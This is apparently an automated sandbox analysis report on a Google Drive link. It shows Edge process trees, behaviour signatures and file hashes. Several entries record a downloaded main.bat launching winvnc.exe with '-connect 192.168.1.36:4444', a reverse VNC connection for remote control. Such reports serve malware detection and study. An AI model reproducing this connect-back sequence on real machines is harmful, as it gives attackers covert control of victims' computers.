Analysis
-
max time kernel
112s -
max time network
110s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
06-08-2024 21:23
General
-
Target
https://drive.google.com/drive/folders/1o_FvCzw_5IKZ8_bm_Om9y_7MArSpq41k?usp=sharing
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of FindShellTrayWindow 37 IoCs
-
Suspicious use of SendNotifyMessage 27 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1o_FvCzw_5IKZ8_bm_Om9y_7MArSpq41k?usp=sharing1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcfede46f8,0x7ffcfede4708,0x7ffcfede47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5788 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,8702220412071996263,3708671614852396202,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\main.bat" "1⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -run2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -connect 192.168.1.36:44442⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exe"C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\main.bat" "1⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -run2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -connect 192.168.1.36:44442⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\main.bat"1⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -run2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\winvnc.exewinvnc.exe -connect 192.168.1.36:44442⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\client-20240806T212331Z-001\client\main.bat1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD59e3fc58a8fb86c93d19e1500b873ef6f
SHA1c6aae5f4e26f5570db5e14bba8d5061867a33b56
SHA256828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4
SHA512e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e
-
Filesize
152B
MD527304926d60324abe74d7a4b571c35ea
SHA178b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1
SHA2567039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de
SHA512f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd
-
Filesize
1KB
MD5eb4b0be86be678d073fdbb047f51539b
SHA1f1ced0be75bfcc47b59cb930306779d6237b4a78
SHA2565f592ec0ac32bd5edd45a3c53c14f427c8b0891ca1246f096321c2561aecbae3
SHA5129284bcaad2210b9ec6c5849fc6b066dbfb896c5240ab961f03df2ff5d2fdac23e6d075cf6ac37526bf02aa966b4e2d44eb3085546dbe2196c96a5878329c85a0
-
Filesize
1KB
MD5481c854de0b3bccab80332a30b1ea301
SHA13e82d5ebc320e84e89fe79c4eaafeecafc4f8b7b
SHA2564bbf5d10ee34658ce43fcd6a7db625f37d657a88a87a649f97fff29dd12dffc4
SHA51231505305e649f14d80be2106c27b11b7d355a9b65e7b56d7401da3701fbd351bdaf1b474ba41f31d9ac51cc0be551ecb3947aaeaa432a1cd4d887153ed238607
-
Filesize
3KB
MD528fcfe0ae8df205c763d0ec96bb308d2
SHA19c65ac035305dbcd4c0895f894e032045d4e8d24
SHA256a248f21c5c1a38457ae46d4656f54ac781be995b2caa8c48609d9fcdf8f0430e
SHA5125467df0563bec9dfe9219c48cd53bc40989975b080a8b3c3601c8cde15c1de58020545dbeb5597ea0dd0b2cd3ba725101b9305376bd86f6a18e7bc931f122f39
-
Filesize
6KB
MD543d1793f432f5c16d6c86d25d24eb09c
SHA1c3e583b9e68db82a575cb8ea259004c0feb0d052
SHA256f052280741f9076cad4a3a0c618c6930d5f726757427312aa5674c5d953a6497
SHA512304a7df5d6c2c43073a8fdb199d2e092cd56ed870583b6c3d03e05fa7397363951b92739f37b32c62278c449375898ada8efee3b6dc0d398071ed6903ec93651
-
Filesize
6KB
MD575f60177c224566b332b0f0ca88a11f1
SHA1152a93ccbc8d8eef74402268977ab3a7b8305484
SHA2569457876db0f1e8985e3db933db0eea6bdff8c0e50c7496b75d2fc31d56320a07
SHA512c507e4da4a56087059fb22122489146bd3a9ecb1edf970f141a11b0792efbf69e8318bb3208c6b43c6af5c33132fb955a5023241836c59f4d884ac436de5b81d
-
Filesize
6KB
MD5070fd0f70c6c2fc2e9275ccea777126c
SHA1ab8206232bf858090a083c6edd3631cdf042db07
SHA25690c0eee1da25b5becd11e437546906f38b88d6477e199393416974e7ca297a05
SHA512486336f3931adc02d8c2894e8c71551ba419639310f28b9ed0cb1c8ea9c40fefa5cdb3f27c0fa179bfd2d732edf13f2476910519b44f9d39e13cd785e9fd7888
-
Filesize
1KB
MD51d230b711dd4bdcff54a5b8e0704fefb
SHA177b0cea7e87cae3169f2149fba794e8d68d690b2
SHA2566bacaa9d8e429ce2846b885190d000a084f6b0c28df2f9c2c229c0dafb0be411
SHA512d48640d443af530bbbe07441530eceaa960a6d4b264daac12f9ba0adf67de28198908b6ae4554bb4283929b4f12732027fb560b0cdfd50494a2a12a04bf7b31e
-
Filesize
1KB
MD59da9f13302a7be2a10b2d8773df34bb3
SHA1eae4147fc2282d553b4aec626664a26136a465c7
SHA256dfac38c150d8f859ef9edb5b0db7016bc6e4c7e26740b950c22b5ba026de86d7
SHA512e863e809f1f0a0700cffde4e6734975f87da64ad1c6bfe767ef43fe3184ee7a5183d4c7b6f24239b9f6fe131c6606bfdbb97fba38584f6706be4a6e87fe121c3
-
Filesize
1KB
MD5f7471a92823163492f63d04ea6364e46
SHA19503b116879225fa69cc50f34c907dde39ce167d
SHA2560d0331bdefae1955dc11c4051b17737f191c05c78208a6ed2f38663c967dae13
SHA512692f10414b3bc1288ba15ded183e6911d166ebd51790c0b6515cae17a84a627ffda7e2bfcbc0035e4bdf19064e94da2c62321ef1c9d8a56a957fcbfff0781ddd
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD528576f4e38f18b1ead358bb24a530cbb
SHA132ae15b01c08ef7c369f72507421d6e1fb5b7dae
SHA256f103e190d78ff02e9a7badaf885db89437802dc68c16ffc080ff395457188cce
SHA512100dcb520d00f317acd04453b93d00ed59d5ef20ec6018902a8dc33492063f579387be59ee9bc8038da016f6a47c1a71891e84607c4b545dfc15ecda0df544ff
-
Filesize
11KB
MD5761442320aadf1322c192d6c4f86653b
SHA1dcba642e1da21e4c48d4d55104e19cdc33a5294f
SHA256c941dc47dd478fb5bf51b77ad6c72841f49851c61a1c5678e42020dfd1cd9800
SHA512542d92f6958dc65511b079c57543d4921b22b1ee173cf73db12bb065ce49c567429ae731938e346821f0b886254a9e04339b262bdb9e5ba8230d22aeaa7b5ee2
-
Filesize
1.0MB
MD5776bdbf74bb84adf7db6beabd0d9f8f1
SHA1cdda7140852cc7c180cbb13eb597377cbac70a18
SHA25690f9427c8fd9a86af0a8dd96210fb037dd486ec19288c02173d23af620cca47e
SHA512bbe934a97e9953472dcd769994b50e8eddd4a58712f157abfe8ada50943020c35fb82569312343b36c16e1e7b45c43f553ff53d2248dc9e0adcf9d2dc8b773fb